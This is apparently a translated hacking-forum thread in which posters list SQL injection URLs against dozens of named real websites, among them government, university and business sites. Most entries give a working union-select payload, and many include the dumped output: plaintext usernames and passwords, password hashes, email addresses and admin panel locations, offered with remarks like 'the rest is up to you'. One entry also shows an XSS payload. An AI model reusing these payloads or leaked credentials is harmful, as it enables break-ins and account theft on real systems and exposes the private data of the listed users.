http://r2.com.au/news.php?page=6&id=-37+union+select+1,2,3,4,5/*
-----------------------------------------------------------------------
http://www.recipeforhappiness.com.au/news.php?p=shw&id=-101+union+select+1,2,3,4,5,6,7,8+from+admin/*
Could not work out the columns
-----------------------------------------------------------------------
http://www.ecoaction.com.au/news.php?id=-40+union+select+1,2,3,concat(username,char(58),password),5,6+from+users/*
admin:m3mph15
-----------------------------------------------------------------------
http://nsw.cchr.org.au/news.php?id=-62+union+select+table_name,2,3,4,5+from+information_schema.tables/*
-----------------------------------------------------------------------
http://www.swiss.org.au/news.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
-----------------------------------------------------------------------
http://www.4id.com.au/news.php?action=show&news_id=-1+union+select+1,concat(username,char(58),password),3+from+users/*
-----------------------------------------------------------------------
http://www.screenact.act.gov.au/news.php?action=index&id=-6+union+select+1/*
-----------------------------------------------------------------------
http://www.applehomeloan.com.au/news.php?id=-73+union+select+1,2,3,4/*
-----------------------------------------------------------------------
http://www.puo.pl/news.php?id=-40+union+select+1,2,3,4,5,6/*&backlink=/
-----------------------------------------------------------------------
http://www.proszowki-basen.pl/news.php?id=-186+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+1,100/*
-----------------------------------------------------------------------
http://www.zieloni.org.pl/news.php?id=-3670+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+information_schema.tables+limit+1,100/*&PHPSESSID=d541b457ccf042d5d0efd1c85a3234de
-----------------------------------------------------------------------
http://www.ukraine-emb.pl/pl/news.php?id=-271+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
-----------------------------------------------------------------------
http://www.azs.agh.edu.pl/news.php?id=-258+union+select+1,2,3,4,5,concat(name,char(58),password),7+from+users/*
Admin panel: http://www.azs.agh.edu.pl/logon.php
dosin:zadzior
codzio:warkastrong
sekretariat:rena21ta
kip9:nuvedewiu8eevr
Rino:rinoonir
-----------------------------------------------------------------------
http://www.turystyka.org.pl/news.php?id=-60'+union+select+1,2,3,4,5,6,7,8,9/*
-----------------------------------------------------------------------
http://www.am-strategies.com/en/news.php?ID=-149+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(char(58),login,password,email),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+users/*
admin:test:[email protected]
http://am-strategies.com/admin
the password doesn't work
-----------------------------------------------------------------------
http://www.bfexplode.de/en/news.php?id=-11+union+select+1,2,password,4+from+users/*
Didn't find the columns((
-----------------------------------------------------------------------
http://audit.kharkov.com/en/news.php?id=-126+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables/*
There is a phpbb_users table
-----------------------------------------------------------------------
http://www.focifum.com/en/news.php?list=0&ID=-7+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.ekobus.cz/en/news.php?id=-1169768767+union+select+1,2,concat(user,char(58),pass),4+from+admin/*&lan=en
bus:buPJAuU2.yYGM DES(UNIX)
Admin panel: http://www.ekobus.cz/admin/
-----------------------------------------------------------------------
http://www.qanat.info/news.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*&mode=en
-----------------------------------------------------------------------
http://fph.tu.ac.th/en/news.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*&cate=1
-----------------------------------------------------------------------
http://www.audica.co.uk/en/news.php?id=-13+union+select+1,2,3,4,5+from+users/*
-----------------------------------------------------------------------
http://www.le-temps-suspendu.com/revesdesagas/en/news.php?id=-37+union+select+1,2,version(),4/*
-----------------------------------------------------------------------
http://www.xeltek.com.cn/en/news.php?id=-30+union+select+1,2,3,4,5,6/*
P.S. Don't be too hard on me))
http://www.abruzzoverdeblu.it/?id=-67+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* http://www.fuorissimo.it/php-bin/joke/users.php?ID=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12/* http://www.casoniatuttabirra.it/artista.php?id=-1+union+select+1,2,3,4,user(),6,7/*
http://www.tigella.it/news.php?ID=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
-----------------------------------------------------------------------
http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,concat(user,char(58),password),5,6,7,8+from+mysql.user/*
The password isn't displayed((
edinteractive.co.uk
HTML: http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6/*
USER:ediadmin@scary
VERSION:5.0.45-community-log
DATABASE:edi
HTML: http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,column_name,4,5,6+from+information_schema.columns/* - names of all columns
HTML: http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,table_name,4,5,6+from+information_schema.tables/* - names of all tables
Project name CMC )
HTML: http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,concat(id,0x3a,project_name,0x3a,website_link),4,5,6+from+aei_portfolio/*
Code: http://www.naushko.ru/whisper.php?id=-3887+union+select+1,2,3,concat_ws(0x2F,userid,name,pass,email),5,6+from+users+limit+2,2/* Version 5.026 name/pass/mail Руслан/asdsdf/[email protected] Perfecto/prf/[email protected]
http://www.afa.org.tw/
HTML: http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9/*
4.1.20:afa@localhost:afa
HTML: http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,admin_password,6,7,8,9+FROM+admin/*
a65660c1c91cd0a717c1d3ebc7f66c68
(if anyone needs it, the admin panel is here: http://www.afa.org.tw/admin/, and the email is: [email protected])
HTML: http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,concat_ws(0x3a,username,user_password,user_email),6,7,8,9+FROM+phpbb_users+LIMIT+1,1/*
JChen:b51699d453f963ae42af5b37563e3ab2:[email protected]
...
P.S. Looks like the site is Chinese, and I was wondering why their forum is kind of odd
http://www.studiolegalebartolini.it/news.php?id=-66+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.ipmaroma2008.it/news.php?ID=-00017+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.kanzlei-tmfg.de/news.php?id=-10+union+select+1,2,table_name+from+information_schema.tables/*&r=25
All tables
http://www.kanzlei-tmfg.de/news.php?id=-10+union+select+1,2,column_name+from+information_schema.columns/*&r=25
All columns
The rest is up to you))
-----------------------------------------------------------------------
http://www.bppa.at/de/news.php?id=-18+union+select+1,2,3,4/*
-----------------------------------------------------------------------
http://metfan.de/news.php?id=-258+union+select+1,2,3,4,5,6,7,8,9/*
2 Tigger
Carry your injections through to the end, or at least output version(), user(), database(). Don't just leave them after only matching the fields. There's no point =\
2 all =)
HTML: http://www.livingstonfc.co.uk/newsdet.php?news_id=-399+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&type_id=1
4.0.24:user12325072_1@superultra19.
HTML: http://www.livingstonfc.co.uk/newsdet.php?news_id=-399+UNION+SELECT+1,2,concat_ws(0x3a,name,user_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+users/*&type_id=1
Not important:tractor
http://www.zik.com.ua/
HTML: http://www.zik.com.ua/index.php?news_id=45555+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
4.1.22-log:zik@localhost:zik
http://www.nisc.lt/
HTML: http://www.nisc.lt/lt/news.php?news_id=205+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*
5.0.27-log:nisc@mysql50:nisc
HTML: http://www.nisc.lt/lt/news.php?news_id=205+UNION+SELECT+1,2,convert(table_name+using+latin1),4,5+FROM+information_schema.tables/*
1: admin:fa2a336347b0da6f022232868d831c73: [email protected]
9: martinas:16f48b6a5ffdf2665c25dba0a58df350: [email protected]
10: olia:ade9fb3441b9794e97329a4adf2b4939: [email protected]
Code: http://www.teasetrip.com/tnews.php?op=tnews&id=-447+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11+from+users+limit+1,1/* Code: http://www.actupix.net/tnews.php?op=tnews&id=-56+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11,12+from+users/*
http://vmashine.ru - В Машине.ру
Your page settings -> Car management -> Add a car -> the very first <options> field
So, none of the value attributes of the <select> are filtered.... we replace the value of any parameter, using something like Firebug, with -1 or '+blabla, well, basically everything as you usually do, only with POST requests....
You can also find out the local path through sessions.... by truncating them
(c) ettte
http://www.cultura.usb.ve/ Code: http://www.cultura.usb.ve/noticia.php?id=-1+union+select+1,2,3,convert(concat_ws(0x3a,user(),database(),version())+using+latin1),5,6,7,8,9,10,11/* http://www.davidluna.com.ve/ Code: http://www.davidluna.com.ve/index.php?ID=-1+union+select+1,2,concat_ws(0x3a,login,password),4,5,6+from+login/* http://www.forosocialmundial.org.ve/ Code: http://www.forosocialmundial.org.ve/noticia_mas.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10/* http://www.tiburonesdelaguaira.com.ve/ Code: http://www.tiburonesdelaguaira.com.ve/mostrar_noticia.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+0,1/* http://www.vaspuntofijo.com.ve/ Code: http://www.vaspuntofijo.com.ve/repuestos.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())/* http://galeria.uc.edu.ve/ Code: http://galeria.uc.edu.ve/noticias.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4+from+mysql.user/* root:*822F83E1D728CFD3D28DC5D309DE95F0EAC258E9
turkystan.kz
HTML: http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,USER(),VERSION(),DATABASE()/*
USER:[email protected]
VERSION:4.1.22
DATABASE:turkesdb
HTML: http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,concat(ID,0x3a,login,0x3a,password),2,3+from+users/*
Table - users
Fields - id,login,password
1:admin:51a71aa84f5e79ad
XSS via SQL)
HTML: http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,'%3Cscript%3Ealert(/XSS/)%3C/script%3E',2,3+from+users/*
5.0.45-log
but I didn't find anything with passwords in the database
----------------------------------------------------------------------
www.travelhit.pl
5.0.45-community
hermantravel:merLINxLasT
but it didn't work anywhere
there are:
http://www.travelhit.pl/admin
http://www.travelhit.pl/cpanel
----------------------------------------------------------------------
5.0.45-community
a heap of all sorts of junk in their native language ((
----------------------------------------------------------------------
5.0.45-community
Code: http://www.compasspoint.org/boardcafe/details.php?id=805+union+select+1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database(),0x71),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
compasspoint@localhost:4.1.11-Debian_4sarge7-log:compasspointq
Code: http://www.hornets247.com/post.php?id=37007+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5/*
4.0.27maxlog:hornets247_v4_0:[email protected]
Code: http://skyscrapernews.com/buildings.php?id=223+order+by+229/*
229 columns)))
Code: http://www.hogwartsnet.ru/fanf/member.php?id=-1653+union+select+concat_ws(0x2F,version(),id,name,password),2,3,4,5,6,7,8,9+from+u45544_ipbd.ipbd_forums/* Version 5.0.46
http://team-rs.ru Code: http://team-rs.ru/member.php?id=-24+union+select+1,2,3,4,concat_ws(0x2F,id,login,password),6,version(),8,9,10+from+dtool_users/* Version : 5.0.45-log/[email protected]/u13952 login / password 30VC06T0 / 2A3TFH5A 4YYH6M58 / 5M42I233
http://voss.kyrkjer.net/ HTML: http://voss.kyrkjer.net/news.php?news_id=14'+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13/* 4.0.20-standard:voss@localhost:voss http://www.antonwachterprijs.nl/ HTML: http://www.antonwachterprijs.nl/top1.php?news_id=-21'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8/* 4.1.22-community-nt:flyingbookmarks@localhost:awp
Some kind of engine, probably custom-written. The admin panel allows uploading files to the server. It detects shells.
csgn.org
HTML: http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),8,9,10,11,12,13,14,15/*
USER:[email protected]
VERSION:5.0.19-nt
DATABASE:csgn
HTML: http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(id,0x3a,name,0x3a,password)+using+latin1),8,9,10,11,12,13,14,15+from+user/*
HTML: http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(table_name)+using+latin1),8,9,10,11,12,13,14,15+from+information_schema.tables/* - names of all tables
HTML: http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(column_name)+using+latin1),8,9,10,11,12,13,14,15+from+information_schema.columns/* - names of all columns
Table - user
Fields - id,name,password
1:ahiggins:new123 - admin
Worked it all the way through